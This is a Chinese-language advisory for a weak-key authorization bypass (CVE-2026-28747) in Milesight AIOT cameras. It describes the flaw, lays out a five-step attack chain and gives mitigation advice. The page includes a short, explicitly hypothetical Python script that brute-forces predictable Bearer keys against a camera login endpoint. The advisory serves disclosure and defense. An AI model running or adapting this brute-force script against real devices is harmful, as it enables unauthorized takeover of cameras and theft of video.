CVE-2026-28747 CVSS 7.1 高危

CVE-2026-28747 Milesight AIOT摄像头授权绕过漏洞

披露日期: 2026-04-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-28747

漏洞类型

授权绕过

CVSS评分

7.1 高危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Milesight AIOT cameras

漏洞概述

Milesight AIOT摄像头特定固件版本存在弱密钥生成漏洞。由于加密密钥生成算法存在缺陷，攻击者可预测有效密钥，从而绕过设备正常的身份验证机制。成功利用此漏洞可能导致攻击者完全接管设备，造成敏感数据泄露、系统配置被篡改及服务中断。

技术细节

该漏洞源于设备在生成用于身份验证或会话加密的密钥时，使用了熵值不足的随机数生成器或固定种子。这使得生成的密钥在数学上是可预测的。攻击者通过分析设备的网络流量或利用已知的固件信息，可以还原出密钥生成的算法逻辑。一旦计算出有效密钥或利用已知弱密钥，攻击者即可向目标设备发送特制的认证请求。由于系统无法区分弱密钥与强密钥的差异，攻击者能够以管理员权限绕过登录界面，直接获取对摄像头的完全控制权，进而执行恶意操作。

攻击链分析

STEP 1

信息收集

扫描网络环境，识别目标Milesight AIOT摄像头及其固件版本。

STEP 2

漏洞分析

分析目标设备的固件或网络流量，确定弱密钥生成的算法逻辑或种子范围。

STEP 3

密钥预测

基于分析出的算法，在本地快速计算出可能的弱密钥列表。

STEP 4

利用攻击

使用预测出的密钥向设备发送认证请求，尝试绕过正常的身份验证流程。

STEP 5

获取控制

成功绕过后，获取设备管理权限，窃取视频数据或控制设备行为。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import itertools

# Conceptual Proof of Concept (PoC) for CVE-2026-28747
# This script demonstrates how an attacker might attempt to bypass
# authorization using weak key generation logic.

TARGET_IP = "192.168.1.100"
TARGET_URL = f"http://{TARGET_IP}/api/v1/login"

# Simulating the weak key generation space
# In a real scenario, this logic would be reversed from the firmware
def generate_weak_keys(seed_range):
    weak_keys = []
    for i in seed_range:
        # Example of a weak transformation
        weak_key = f"key_{i:04d}"
        weak_keys.append(weak_key)
    return weak_keys

def attempt_auth_bypass(url, keys):
    print(f"[*] Attempting auth bypass on {url}...")
    for key in keys:
        headers = {
            "User-Agent": "Mozilla/5.0",
            "Authorization": f"Bearer {key}" # Hypothetical header
        }
        try:
            response = requests.get(url, headers=headers, timeout=2)
            if response.status_code == 200:
                print(f"[+] Bypass successful! Valid key found: {key}")
                print(f"[+] Response: {response.text}")
                return True
        except requests.RequestException as e:
            continue
    print("[-] Bypass failed.")
    return False

if __name__ == "__main__":
    # Generate a limited set of keys based on possible weak seeds
    potential_keys = generate_weak_keys(range(0, 1000))
    attempt_auth_bypass(TARGET_URL, potential_keys)

影响范围

Milesight AIOT cameras 特定固件版本

防御指南

临时缓解措施

建议立即将设备隔离在独立的VLAN中，禁止公网访问管理接口。在未升级固件前，应严格限制物理访问，并监控设备的异常网络流量。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表